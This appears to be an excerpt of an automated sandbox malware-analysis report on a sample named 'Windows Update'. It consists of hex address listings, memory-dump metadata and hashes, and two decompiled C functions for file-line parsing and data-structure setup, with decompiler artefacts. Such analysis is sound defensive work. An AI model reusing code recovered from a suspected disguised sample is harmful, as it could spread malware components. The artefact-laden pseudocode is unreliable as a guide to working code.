                                                                                                                    0x00023d91
                                                                                                                    0x00023d92
                                                                                                                    0x00023d92
                                                                                                                    0x00023d98
                                                                                                                    0x00023d9a
                                                                                                                    0x00023d9c
                                                                                                                    0x00023d9e
                                                                                                                    0x00023da2
                                                                                                                    0x00023e08
                                                                                                                    0x00023e08
                                                                                                                    0x00023e11
                                                                                                                    0x00023e13
                                                                                                                    0x00023e18
                                                                                                                    0x00000000
                                                                                                                    0x00023e1a
                                                                                                                    0x00023e1f
                                                                                                                    0x00023e26
                                                                                                                    0x00023e2c
                                                                                                                    0x00023e31
                                                                                                                    0x00023e33
                                                                                                                    0x00023e38
                                                                                                                    0x00023e45
                                                                                                                    0x00023e47
                                                                                                                    0x00023e4c
                                                                                                                    0x00023e3a
                                                                                                                    0x00023e3a
                                                                                                                    0x00023e3a
                                                                                                                    0x00023e50
                                                                                                                    0x00000000
                                                                                                                    0x00023e55
                                                                                                                    0x00023da4
                                                                                                                    0x00023daa
                                                                                                                    0x00023daa
                                                                                                                    0x00023dad
                                                                                                                    0x00023db6
                                                                                                                    0x00023db8
                                                                                                                    0x00023dbd
                                                                                                                    0x00023de3
                                                                                                                    0x00023dea
                                                                                                                    0x00023df6
                                                                                                                    0x00023df8
                                                                                                                    0x00023e58
                                                                                                                    0x00023e5a
                                                                                                                    0x00000000
                                                                                                                    0x00023e60
                                                                                                                    0x00023e72
                                                                                                                    0x00023e78
                                                                                                                    0x00023e92
                                                                                                                    0x00023e92
                                                                                                                    0x00023dbf
                                                                                                                    0x00023dbf
                                                                                                                    0x00023dc0
                                                                                                                    0x00023dca
                                                                                                                    0x00023ddd
                                                                                                                    0x00023ddd
                                                                                                                    0x00023dbd

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$_malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3756984125-0
                                                                                                                    • Opcode ID: ad8f61c70eb99b68e000178201a2b036042c6bc6eddace92ec67a90037131b91
                                                                                                                    • Instruction ID: 1a63b0e183f8354cd14e4b95d63298f3e141a9c5a9762a679a99dcc8adc50537
                                                                                                                    • Opcode Fuzzy Hash: ad8f61c70eb99b68e000178201a2b036042c6bc6eddace92ec67a90037131b91
                                                                                                                    • Instruction Fuzzy Hash: FE310971E41114ABCB20AB74AC46FEF72A89F45710F148178F90D97143EF399E0987A9
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0001E577 Relevance: 12.2, APIs: 8, Instructions: 245COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 71%
                                                                                                                    			E0001E577(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v1032;
				char _v1532;
				char _v6532;
				char _v11532;
				char _v21536;
				void* _t60;
				intOrPtr _t63;
				void* _t65;
				char _t69;
				void* _t76;
				intOrPtr* _t78;
				signed int _t79;
				void* _t81;
				intOrPtr _t82;
				intOrPtr _t83;
				intOrPtr _t84;
				intOrPtr _t87;
				void* _t101;
				intOrPtr* _t115;
				intOrPtr _t125;
				intOrPtr* _t126;
				void* _t127;
				intOrPtr* _t132;
				void* _t133;
				intOrPtr* _t134;
				void* _t135;
				intOrPtr* _t136;
				void* _t139;
				void* _t141;
				intOrPtr* _t142;
				void* _t144;
				intOrPtr* _t146;
				void* _t147;
				signed int _t149;
				signed int _t152;
				void* _t153;
				void* _t155;
				void* _t158;
				void* _t160;

				_t145 = __esi;
				_t144 = __edi;
				_t127 = __ebx;
				_t149 = _t152;
				E00077307(0x541c);
				_v8 =  *0x481f80 ^ _t149;
				_v21536 = 0;
				_t60 = E0007928A( &_v21536, _a4, 0x470890);
				_t153 = _t152 + 0xc;
				if(_t60 != 0) {
					L32:
					__eflags = 0;
					return E000772F2(0, _t127, _v8 ^ _t149, _t141, _t144, _t145);
				} else {
					_t63 = _v21536;
					_t162 = _t63;
					if(_t63 == 0) {
						goto L32;
					} else {
						_push(__esi);
						_push(_t63);
						_push(0x1388);
						_push( &_v11532);
						_t146 = 0;
						_t65 = E00079087(__ebx, __edi, 0, _t162);
						_t155 = _t153 + 0xc;
						if(_t65 == 0) {
							L31:
							_push(_v21536);
							E00079010(_t127, _t144, _t146, _t177);
							_pop(_t147);
							return E000772F2(1, _t127, _v8 ^ _t149, _t141, _t144, _t147);
						} else {
							_push(__edi);
							do {
								_t132 =  &_v11532;
								_t141 = _t132 + 1;
								do {
									_t69 =  *_t132;
									_t132 = _t132 + 1;
								} while (_t69 != 0);
								_t133 = _t132 - _t141;
								if(_t133 == 0) {
									L9:
									E00077AF9( &_v6532, 0x1388,  &_v11532);
									E00078317( &_v6532, 0x1388);
									_t76 = E00078487( &_v6532, 0x470894);
									_t158 = _t155 + 0x1c;
									if(_t76 == 0) {
										_t78 = E00078487( &_v6532, 0x47089c);
										_t158 = _t158 + 8;
										__eflags = _t78;
										if(_t78 != 0) {
											_v1032 = 0;
											_v520 = 0;
											_v264 = 0;
											_t146 = 1;
										}
										_t40 = _t146 - 1; // 0x0
										_t79 = _t40;
										__eflags = _t79 - 6;
										if(__eflags <= 0) {
											goto ( *((intOrPtr*)(0x40432c + _t79 * 4)));
										}
									} else {
										_t134 =  &_v1032;
										_t141 = _t134 + 1;
										do {
											_t82 =  *_t134;
											_t134 = _t134 + 1;
										} while (_t82 != 0);
										_t135 = _t134 - _t141;
										if(_t135 == 0) {
											L24:
											_v1032 = 0;
											_v520 = 0;
											_v264 = 0;
										} else {
											_t142 =  &_v264;
											_t144 = _t142 + 1;
											do {
												_t83 =  *_t142;
												_t142 = _t142 + 1;
											} while (_t83 != 0);
											_t141 = _t142 - _t144;
											if(_t141 == 0 || _t135 < 1 || _t141 < 1) {
												goto L24;
											} else {
												_t136 =  &_v520;
												_t141 = _t136 + 1;
												do {
													_t84 =  *_t136;
													_t136 = _t136 + 1;
												} while (_t84 != 0);
												if(_t136 - _t141 < 1) {
													goto L24;
												} else {
													E00077AF9( &_v1532, 0x1f4, 0x470a20);
													_t87 =  *0x4833ac;
													_t160 = _t158 + 0xc;
													_t176 = _t87;
													if(_t87 != 0) {
														_push( &_v1532);
														_push(0x470aac);
														_push(_t87);
														E000792CF(_t127, _t144, _t146, __eflags);
														_push( &_v1032);
														_push(0x470abc);
														_push( *0x4833ac);
														E000792CF(_t127, _t144, _t146, __eflags);
														E000793E1( *0x4833ac, 0x470acc,  &_v264);
														E000793E1( *0x4833ac, 0x470adc,  &_v520);
														_push( *0x4833ac);
														_push(0x470af0);
														E000793FA(_t127, _t144, _t146, __eflags);
														_t158 = _t160 + 0x38;
														goto L24;
													} else {
														_push( &_v1032);
														_push( &_v520);
														_push( &_v264);
														_push( &_v1532);
														_push(0x470a8c);
														E00079C53(_t127, _t144, _t146, _t176);
														_t158 = _t160 + 0x14;
														_v1032 = 0;
														_v520 = 0;
														_v264 = 0;
													}
												}
											}
										}
									}
									goto L29;
								} else {
									_t139 = _t133 - 1;
									if(_t139 >= 0x1388) {
										_t101 = L00077EEC();
										if(__eflags >= 0) {
											 *((intOrPtr*)(_t101 + 0x4c004041)) =  *((intOrPtr*)(_t101 + 0x4c004041)) + _t127;
											 *((intOrPtr*)(_t141 + 0x41)) =  *((intOrPtr*)(_t141 + 0x41)) + _t141;
											 *((intOrPtr*)(_t144 + 0x8004041)) =  *((intOrPtr*)(_t144 + 0x8004041)) + _t127;
											 *_t146 =  *_t146 + _t139 + 1;
											_t141 = _t141 + 2;
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											_t125 = E0001B9C7(_t127, _t141, 0x483320);
											_t155 = _t155 + 4;
											 *0x4833a0 = _t125;
											_t126 = L0001BDC7(_t127, _t144, _t146);
											 *0x4833a8 = _t126;
											__eflags = _t126;
										}
										if(__eflags != 0) {
											E0001F1D7();
										}
										L0001CCF7(_t141, 5);
										L0001CCF7(_t141, 0xe);
										L0001CCF7(_t141, 0xd);
										L0001CCF7(_t141, 0x10);
										L0001CCF7(_t141, 0x11);
										E0001D127(__eflags, 7);
										E0001D127(__eflags, 0xf);
										__eflags =  *0x4833a0 - 7;
										if( *0x4833a0 >= 7) {
											L0001BF57(_t127, _t141, _t144, _t146);
											E0001DA77();
											E0001EB67();
										} else {
											L0001DF27();
										}
										L0001D1C7(_t127, _t141);
										E0001D6C7(_t127, _t141, _t144, _t146);
										E0001D867(_t127, _t141, _t144, _t146);
										_t115 =  *0x4843b0;
										__eflags = _t115;
										if(_t115 != 0) {
											return  *0x470114(_t115);
										}
										return _t115;
									} else {
										 *((char*)(_t149 + _t139 - 0x2d08)) = _t69;
										goto L9;
									}
								}
								goto L44;
								L29:
								_push(_v21536);
								_push(0x1388);
								_push( &_v11532);
								_t81 = E00079087(_t127, _t144, _t146, _t176);
								_t155 = _t158 + 0xc;
								_t177 = _t81;
							} while (_t81 != 0);
							_pop(_t144);
							goto L31;
						}
					}
				}
				L44:
			}













































                                                                                                                    0x0001e577
                                                                                                                    0x0001e577
                                                                                                                    0x0001e577
                                                                                                                    0x0001e578
                                                                                                                    0x0001e57f
                                                                                                                    0x0001e58b
                                                                                                                    0x0001e59e
                                                                                                                    0x0001e5a8
                                                                                                                    0x0001e5ad
                                                                                                                    0x0001e5b2
                                                                                                                    0x0001ea8d
                                                                                                                    0x0001ea92
                                                                                                                    0x0001ea9c
                                                                                                                    0x0001e5b8
                                                                                                                    0x0001e5b8
                                                                                                                    0x0001e5be
                                                                                                                    0x0001e5c0
                                                                                                                    0x00000000
                                                                                                                    0x0001e5c6
                                                                                                                    0x0001e5c6
                                                                                                                    0x0001e5c7
                                                                                                                    0x0001e5ce
                                                                                                                    0x0001e5d3
                                                                                                                    0x0001e5d4
                                                                                                                    0x0001e5d6
                                                                                                                    0x0001e5db
                                                                                                                    0x0001e5e0
                                                                                                                    0x0001ea6b
                                                                                                                    0x0001ea6b
                                                                                                                    0x0001ea71
                                                                                                                    0x0001ea7e
                                                                                                                    0x0001ea8c
                                                                                                                    0x0001e5e6
                                                                                                                    0x0001e5e6
                                                                                                                    0x0001e5e7
                                                                                                                    0x0001e5e7
                                                                                                                    0x0001e5ed
                                                                                                                    0x0001e5f7
                                                                                                                    0x0001e5f7
                                                                                                                    0x0001e5f9
                                                                                                                    0x0001e5fa
                                                                                                                    0x0001e5fe
                                                                                                                    0x0001e600
                                                                                                                    0x0001e616
                                                                                                                    0x0001e629
                                                                                                                    0x0001e63a
                                                                                                                    0x0001e64b
                                                                                                                    0x0001e650
                                                                                                                    0x0001e655
                                                                                                                    0x0001e7b0
                                                                                                                    0x0001e7b5
                                                                                                                    0x0001e7b8
                                                                                                                    0x0001e7ba
                                                                                                                    0x0001e7bc
                                                                                                                    0x0001e7c3
                                                                                                                    0x0001e7ca
                                                                                                                    0x0001e7d1
                                                                                                                    0x0001e7d1
                                                                                                                    0x0001e7d6
                                                                                                                    0x0001e7d6
                                                                                                                    0x0001e7d9
                                                                                                                    0x0001e7dc
                                                                                                                    0x0001e7e2
                                                                                                                    0x0001e7e2
                                                                                                                    0x0001e65b
                                                                                                                    0x0001e65b
                                                                                                                    0x0001e661
                                                                                                                    0x0001e667
                                                                                                                    0x0001e667
                                                                                                                    0x0001e669
                                                                                                                    0x0001e66a
                                                                                                                    0x0001e66e
                                                                                                                    0x0001e670
                                                                                                                    0x0001e78a
                                                                                                                    0x0001e78a
                                                                                                                    0x0001e791
                                                                                                                    0x0001e798
                                                                                                                    0x0001e676
                                                                                                                    0x0001e676
                                                                                                                    0x0001e67c
                                                                                                                    0x0001e67f
                                                                                                                    0x0001e67f
                                                                                                                    0x0001e681
                                                                                                                    0x0001e682
                                                                                                                    0x0001e686
                                                                                                                    0x0001e688
                                                                                                                    0x00000000
                                                                                                                    0x0001e6a0
                                                                                                                    0x0001e6a0
                                                                                                                    0x0001e6a6
                                                                                                                    0x0001e6a9
                                                                                                                    0x0001e6a9
                                                                                                                    0x0001e6ab
                                                                                                                    0x0001e6ac
                                                                                                                    0x0001e6b5
                                                                                                                    0x00000000
                                                                                                                    0x0001e6bb
                                                                                                                    0x0001e6cc
                                                                                                                    0x0001e6d1
                                                                                                                    0x0001e6d6
                                                                                                                    0x0001e6d9
                                                                                                                    0x0001e6db
                                                                                                                    0x0001e726
                                                                                                                    0x0001e727
                                                                                                                    0x0001e72c
                                                                                                                    0x0001e72d
                                                                                                                    0x0001e738
                                                                                                                    0x0001e739
                                                                                                                    0x0001e73e
                                                                                                                    0x0001e744
                                                                                                                    0x0001e75b
                                                                                                                    0x0001e772
                                                                                                                    0x0001e777
                                                                                                                    0x0001e77d
                                                                                                                    0x0001e782
                                                                                                                    0x0001e787
                                                                                                                    0x00000000
                                                                                                                    0x0001e6dd
                                                                                                                    0x0001e6e3
                                                                                                                    0x0001e6ea
                                                                                                                    0x0001e6f1
                                                                                                                    0x0001e6f8
                                                                                                                    0x0001e6f9
                                                                                                                    0x0001e6fe
                                                                                                                    0x0001e703
                                                                                                                    0x0001e706
                                                                                                                    0x0001e70d
                                                                                                                    0x0001e714
                                                                                                                    0x0001e714
                                                                                                                    0x0001e6db
                                                                                                                    0x0001e6b5
                                                                                                                    0x0001e688
                                                                                                                    0x0001e670
                                                                                                                    0x00000000
                                                                                                                    0x0001e602
                                                                                                                    0x0001e602
                                                                                                                    0x0001e609
                                                                                                                    0x0001ea9d
                                                                                                                    0x0001eaa3
                                                                                                                    0x0001eaa6
                                                                                                                    0x0001eaae
                                                                                                                    0x0001eab2
                                                                                                                    0x0001eaba
                                                                                                                    0x0001eabc
                                                                                                                    0x0001eac0
                                                                                                                    0x0001eac1
                                                                                                                    0x0001eac2
                                                                                                                    0x0001eac3
                                                                                                                    0x0001eac4
                                                                                                                    0x0001eac5
                                                                                                                    0x0001eac6
                                                                                                                    0x0001eacc
                                                                                                                    0x0001ead1
                                                                                                                    0x0001ead4
                                                                                                                    0x0001ead9
                                                                                                                    0x0001eade
                                                                                                                    0x0001eae3
                                                                                                                    0x0001eae3
                                                                                                                    0x0001eae5
                                                                                                                    0x0001eae7
                                                                                                                    0x0001eae7
                                                                                                                    0x0001eaee
                                                                                                                    0x0001eaf5
                                                                                                                    0x0001eafc
                                                                                                                    0x0001eb03
                                                                                                                    0x0001eb0a
                                                                                                                    0x0001eb11
                                                                                                                    0x0001eb18
                                                                                                                    0x0001eb20
                                                                                                                    0x0001eb27
                                                                                                                    0x0001eb30
                                                                                                                    0x0001eb35
                                                                                                                    0x0001eb3a
                                                                                                                    0x0001eb29
                                                                                                                    0x0001eb29
                                                                                                                    0x0001eb29
                                                                                                                    0x0001eb3f
                                                                                                                    0x0001eb44
                                                                                                                    0x0001eb49
                                                                                                                    0x0001eb4e
                                                                                                                    0x0001eb53
                                                                                                                    0x0001eb55
                                                                                                                    0x00000000
                                                                                                                    0x0001eb58
                                                                                                                    0x0001eb5e
                                                                                                                    0x0001e60f
                                                                                                                    0x0001e60f
                                                                                                                    0x00000000
                                                                                                                    0x0001e60f
                                                                                                                    0x0001e609
                                                                                                                    0x00000000
                                                                                                                    0x0001ea48
                                                                                                                    0x0001ea48
                                                                                                                    0x0001ea54
                                                                                                                    0x0001ea59
                                                                                                                    0x0001ea5a
                                                                                                                    0x0001ea5f
                                                                                                                    0x0001ea62
                                                                                                                    0x0001ea62
                                                                                                                    0x0001ea6a
                                                                                                                    0x00000000
                                                                                                                    0x0001ea6a
                                                                                                                    0x0001e5e0
                                                                                                                    0x0001e5c0
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • __wfopen_s.LIBCMT ref: 0001E5A8
                                                                                                                    • _fgets.LIBCMT ref: 0001E5D6
                                                                                                                    • _strstr.LIBCMT ref: 0001E64B
                                                                                                                    • _wprintf.LIBCMT ref: 0001E6FE
                                                                                                                    • _fprintf.LIBCMT ref: 0001E72D
                                                                                                                    • _fprintf.LIBCMT ref: 0001E744
                                                                                                                      • Part of subcall function 000792CF: __lock_file.LIBCMT ref: 00079316
                                                                                                                      • Part of subcall function 000792CF: __stbuf.LIBCMT ref: 0007939B
                                                                                                                      • Part of subcall function 000792CF: __ftbuf.LIBCMT ref: 000793B7
                                                                                                                      • Part of subcall function 000793E1: __vfwprintf_l.LIBCMT ref: 000793F0
                                                                                                                    • _fgets.LIBCMT ref: 0001EA5A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _fgets_fprintf$__ftbuf__lock_file__stbuf__vfwprintf_l__wfopen_s_strstr_wprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2011453255-0
                                                                                                                    • Opcode ID: f22aa0a8c4756a805bed7fa3115c8bb97e7bed8d7fea35043ad2a15e5e62363a
                                                                                                                    • Instruction ID: 5ee429a43129f48aff64d07c9db6e0a5874d6b229b15dbba542508c58726eb44
                                                                                                                    • Opcode Fuzzy Hash: f22aa0a8c4756a805bed7fa3115c8bb97e7bed8d7fea35043ad2a15e5e62363a
                                                                                                                    • Instruction Fuzzy Hash: 1D81F9709443859ADF10EBA0CC46FEE77A8AF11304F0480E9FA4DA7183EA799BC58F55
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0005AA87 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 328COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 99%
                                                                                                                    			E0005AA87(signed int _a4, intOrPtr* _a8, signed int _a12, intOrPtr _a16, signed int _a20, signed int _a24) {
				signed short _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _t116;
				intOrPtr* _t118;
				signed int _t132;
				signed int _t135;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				intOrPtr _t153;
				signed short _t161;
				signed int _t174;
				signed int _t175;
				char* _t182;
				signed int _t183;
				signed int _t184;
				unsigned int _t186;
				intOrPtr _t191;
				intOrPtr _t192;
				intOrPtr _t193;
				intOrPtr _t194;
				intOrPtr _t195;
				char* _t196;
				short _t197;
				signed int _t199;
				intOrPtr _t200;
				intOrPtr* _t201;
				char _t204;
				void* _t205;
				intOrPtr _t206;
				signed int _t207;
				intOrPtr* _t208;
				signed int _t209;
				intOrPtr _t210;
				intOrPtr* _t211;
				signed int _t212;
				char* _t213;
				void* _t217;
				void* _t218;
				void* _t220;
				void* _t221;

				_t186 = _a20;
				_v24 = 0;
				_v12 = 0;
				_t207 = _a4;
				_v28 =  !_t186 & 0x00000001;
				_t116 =  *((intOrPtr*)(_t207 + 4));
				_t209 = 0;
				_t182 = 0;
				_v20 = 0;
				_a20 = _t186 >> 0x00000001 & 0x00000001;
				_v8 = 0x400;
				if(_t116 <= 0x28) {
					_v16 = 0x28;
				} else {
					_v16 = _t116 + 0x00000007 & 0xfffffff8;
				}
				 *_a8 = _t182;
				_t118 = _a12;
				if(_t118 == 0 ||  *_t118 == _t182) {
					L23:
					_v32 = ( *((intOrPtr*)(_t207 + 4)) + 0x00000007 & 0xfffffff8) + (_v16 + _t209) * 2 + 0xea;
					_t208 = E000591B7(( *((intOrPtr*)(_t207 + 4)) + 0x00000007 & 0xfffffff8) + (_v16 + _t209) * 2 + 0xea);
					_t218 = _t217 + 4;
					if(_t208 == 0) {
						E00027247(_t182);
						goto L52;
					} else {
						E00077C87(_t208, 0, _v32);
						_t34 = _t208 + 0xb0; // 0xb0
						_t191 = _t34;
						 *((intOrPtr*)(_t208 + 0xa8)) = _t191;
						_t192 = _t191 + 0x30;
						 *((intOrPtr*)(_t208 + 0x38)) = _t192;
						_t193 = _t192 + ( *((intOrPtr*)(_a4 + 4)) + 0x00000007 & 0xfffffff8);
						 *((intOrPtr*)(_t208 + 0x40)) = _t193;
						_t194 = _t193 + _v16;
						_t220 = _t218 + 0xc;
						 *((intOrPtr*)(_t208 + 0x3c)) = _t194;
						_t195 = _t194 + _v16;
						 *((intOrPtr*)(_t208 + 0x84)) = _t195;
						if(_t182 != 0) {
							_t43 = _t195 + 1; // 0x29
							 *((intOrPtr*)(_t208 + 0x88)) = _t43 + _t209;
							E00077337(_t195, _t182, _t209);
							E00077337( *((intOrPtr*)(_t208 + 0x88)), _t182, _t209);
							_t200 =  *((intOrPtr*)(_t208 + 0x88));
							 *((intOrPtr*)(_t209 + _t200)) =  *0x476244;
							 *((intOrPtr*)(_t209 + _t200 + 4)) =  *0x476248;
							E00027247(_t182);
							_t220 = _t220 + 0x1c;
						}
						_t196 = _a12;
						_t132 = _a4;
						_t183 = _a24;
						 *_t208 = _t132;
						 *(_t208 + 0x78) = _t183;
						if(_t196 == 0 ||  *_t196 == 0 || _v12 != 0) {
							_v24 = 1;
							 *((char*)(_t208 + 0xe)) = 4;
							_t184 = _t183 & 0x00000001;
							goto L36;
						} else {
							_a4 = 0;
							_t199 =  *((intOrPtr*)( *((intOrPtr*)(_t132 + 0x18))))(_t132,  *((intOrPtr*)(_t208 + 0x84)),  *((intOrPtr*)(_t208 + 0x38)), _t183,  &_a4);
							_t221 = _t220 + 0x14;
							_t184 = _a4 & 0x00000001;
							_a12 = _t199;
							if(_t199 != 0) {
								L37:
								_t211 =  *((intOrPtr*)(_t208 + 0x38));
								_t153 =  *_t211;
								if(_t153 != 0) {
									 *((intOrPtr*)( *((intOrPtr*)(_t153 + 4))))(_t211);
									_t221 = _t221 + 4;
									 *_t211 = 0;
								}
								E00027247(_t208);
								return _a12;
							} else {
								if(_t184 == 0) {
									L00045FA7(_t208);
									_t161 =  *(_t208 + 0x70);
									_t220 = _t221 + 4;
									if(_t161 > 0x400) {
										if(_t161 <= 0x2000) {
											_v8 = _t161 & 0x0000ffff;
										} else {
											_v8 = 0x2000;
										}
									}
								}
								L36:
								_t135 = E0005B197(_t208,  &_v8, 0xffffffff);
								_t221 = _t220 + 0xc;
								_a12 = _t135;
								if(_t135 == 0) {
									_t210 =  *((intOrPtr*)(_t208 + 0xa8));
									_a4 = _a16 + 0x00000007 & 0xfffffff8;
									E00077C87(_t210, 0, 0x30);
									_t204 = _v12;
									_t197 = _a4;
									 *(_t210 + 0x14) = _v8 & 0x0000ffff;
									_a4 = 0x424650;
									 *((intOrPtr*)(_t210 + 0x18)) = _t197;
									 *((intOrPtr*)(_t210 + 0x24)) = _t208;
									 *((intOrPtr*)(_t210 + 0x10)) = 0x64;
									 *(_t210 + 0x1c) = 0 | _t204 == 0x00000000;
									_t144 =  ==  ? _a4 : 0;
									 *((intOrPtr*)(_t210 + 0x20)) =  ==  ? _a4 : 0;
									 *((char*)(_t208 + 6)) = _v28;
									if(_a20 == 0 || _t184 == 0) {
										_t146 = 0;
									} else {
										_t146 = 1;
									}
									 *(_t208 + 7) = _t146;
									_t147 = _v24;
									 *((char*)(_t208 + 0x15)) = _t204;
									 *((intOrPtr*)(_t208 + 0x80)) = 0x3fffffff;
									 *(_t208 + 0xb) = _t147;
									 *(_t208 + 4) = _t147;
									 *(_t208 + 0x12) = _t147;
									 *((char*)(_t208 + 0xd)) = _t204;
									 *(_t208 + 0xc) = _t184;
									if(_t147 != 0 || _v28 == 0) {
										_t148 = 1;
									} else {
										_t148 = 0;
									}
									 *(_t208 + 8) = _t148;
									 *((char*)(_t208 + 9)) = _t148 & 0xffffff00 | _t148 == 0x00000000;
									 *((char*)(_t208 + 0xa)) = 2;
									 *((short*)(_t208 + 0x74)) = _t197;
									 *((intOrPtr*)(_t208 + 0xa0)) = 0xffffffff;
									 *((intOrPtr*)(_t208 + 0xa4)) = 0xffffffff;
									L00045FA7(_t208);
									if(_v12 != 0) {
										 *((char*)(_t208 + 5)) = 4;
									}
									 *_a8 = _t208;
									return 0;
								} else {
									goto L37;
								}
							}
						}
					}
				} else {
					_v32 =  *((intOrPtr*)(_t207 + 8)) + 1;
					_t182 = E000591B7( *((intOrPtr*)(_t207 + 8)) + 1 +  *((intOrPtr*)(_t207 + 8)) + 1);
					_t217 = _t217 + 4;
					if(_t182 == 0) {
						L52:
						return 7;
					} else {
						_t212 = _a12;
						_t201 = 0x476238;
						_t174 = _t212;
						while(1) {
							_t205 =  *_t174;
							if(_t205 !=  *_t201) {
								break;
							}
							if(_t205 == 0) {
								L11:
								_t175 = 0;
							} else {
								_t206 =  *((intOrPtr*)(_t174 + 1));
								if(_t206 !=  *((intOrPtr*)(_t201 + 1))) {
									break;
								} else {
									_t174 = _t174 + 2;
									_t201 = _t201 + 2;
									if(_t206 != 0) {
										continue;
									} else {
										goto L11;
									}
								}
							}
							L13:
							 *_t182 = 0;
							if(_t175 != 0) {
								_t175 =  *((intOrPtr*)( *((intOrPtr*)(_t207 + 0x24))))(_t207, _t212, _v32, _t182);
								_t217 = _t217 + 0x10;
								_v20 = _t175;
							} else {
								_v12 = 1;
							}
							_t213 = _t182;
							if( *_t182 != 0) {
								do {
									_t213 = _t213 + 1;
								} while ( *_t213 != 0);
							}
							_t209 = _t213 - _t182 & 0x3fffffff;
							if(_t175 != 0) {
								E00027247(_t182);
								return _v20;
							} else {
								_t24 = _t209 + 8; // 0x9
								if(_t24 <=  *((intOrPtr*)(_t207 + 8))) {
									goto L23;
								} else {
									E00027247(_t182);
									return 0xe;
								}
							}
							goto L53;
						}
						asm("sbb eax, eax");
						_t175 = _t174 | 0x00000001;
						goto L13;
					}
				}
				L53:
			}

















































                                                                                                                    0x0005aa8d
                                                                                                                    0x0005aa92
                                                                                                                    0x0005aa95
                                                                                                                    0x0005aaa2
                                                                                                                    0x0005aaa7
                                                                                                                    0x0005aaaa
                                                                                                                    0x0005aaad
                                                                                                                    0x0005aab2
                                                                                                                    0x0005aab4
                                                                                                                    0x0005aab7
                                                                                                                    0x0005aaba
                                                                                                                    0x0005aac4
                                                                                                                    0x0005aad1
                                                                                                                    0x0005aac6
                                                                                                                    0x0005aacc
                                                                                                                    0x0005aacc
                                                                                                                    0x0005aadb
                                                                                                                    0x0005aadd
                                                                                                                    0x0005aae2
                                                                                                                    0x0005abad
                                                                                                                    0x0005abc4
                                                                                                                    0x0005abcc
                                                                                                                    0x0005abce
                                                                                                                    0x0005abd3
                                                                                                                    0x0005ae11
                                                                                                                    0x00000000
                                                                                                                    0x0005abd9
                                                                                                                    0x0005abdf
                                                                                                                    0x0005abe7
                                                                                                                    0x0005abe7
                                                                                                                    0x0005abed
                                                                                                                    0x0005abf3
                                                                                                                    0x0005abf6
                                                                                                                    0x0005ac02
                                                                                                                    0x0005ac04
                                                                                                                    0x0005ac07
                                                                                                                    0x0005ac0a
                                                                                                                    0x0005ac0d
                                                                                                                    0x0005ac10
                                                                                                                    0x0005ac13
                                                                                                                    0x0005ac1b
                                                                                                                    0x0005ac1e
                                                                                                                    0x0005ac25
                                                                                                                    0x0005ac2b
                                                                                                                    0x0005ac38
                                                                                                                    0x0005ac3d
                                                                                                                    0x0005ac48
                                                                                                                    0x0005ac51
                                                                                                                    0x0005ac55
                                                                                                                    0x0005ac5a
                                                                                                                    0x0005ac5a
                                                                                                                    0x0005ac5d
                                                                                                                    0x0005ac60
                                                                                                                    0x0005ac63
                                                                                                                    0x0005ac66
                                                                                                                    0x0005ac68
                                                                                                                    0x0005ac6d
                                                                                                                    0x0005acdb
                                                                                                                    0x0005acde
                                                                                                                    0x0005ace2
                                                                                                                    0x00000000
                                                                                                                    0x0005ac7a
                                                                                                                    0x0005ac82
                                                                                                                    0x0005ac98
                                                                                                                    0x0005ac9a
                                                                                                                    0x0005ac9d
                                                                                                                    0x0005aca0
                                                                                                                    0x0005aca5
                                                                                                                    0x0005acfa
                                                                                                                    0x0005acfa
                                                                                                                    0x0005acfd
                                                                                                                    0x0005ad01
                                                                                                                    0x0005ad07
                                                                                                                    0x0005ad09
                                                                                                                    0x0005ad0c
                                                                                                                    0x0005ad0c
                                                                                                                    0x0005ad13
                                                                                                                    0x0005ad24
                                                                                                                    0x0005aca7
                                                                                                                    0x0005aca9
                                                                                                                    0x0005acac
                                                                                                                    0x0005acb1
                                                                                                                    0x0005acb4
                                                                                                                    0x0005acbc
                                                                                                                    0x0005acc3
                                                                                                                    0x0005acd1
                                                                                                                    0x0005acc5
                                                                                                                    0x0005acc5
                                                                                                                    0x0005acc5
                                                                                                                    0x0005acc3
                                                                                                                    0x0005acbc
                                                                                                                    0x0005ace4
                                                                                                                    0x0005aceb
                                                                                                                    0x0005acf0
                                                                                                                    0x0005acf3
                                                                                                                    0x0005acf8
                                                                                                                    0x0005ad28
                                                                                                                    0x0005ad39
                                                                                                                    0x0005ad3c
                                                                                                                    0x0005ad45
                                                                                                                    0x0005ad48
                                                                                                                    0x0005ad4b
                                                                                                                    0x0005ad58
                                                                                                                    0x0005ad5f
                                                                                                                    0x0005ad62
                                                                                                                    0x0005ad65
                                                                                                                    0x0005ad6c
                                                                                                                    0x0005ad73
                                                                                                                    0x0005ad7b
                                                                                                                    0x0005ad81
                                                                                                                    0x0005ad84
                                                                                                                    0x0005ad91
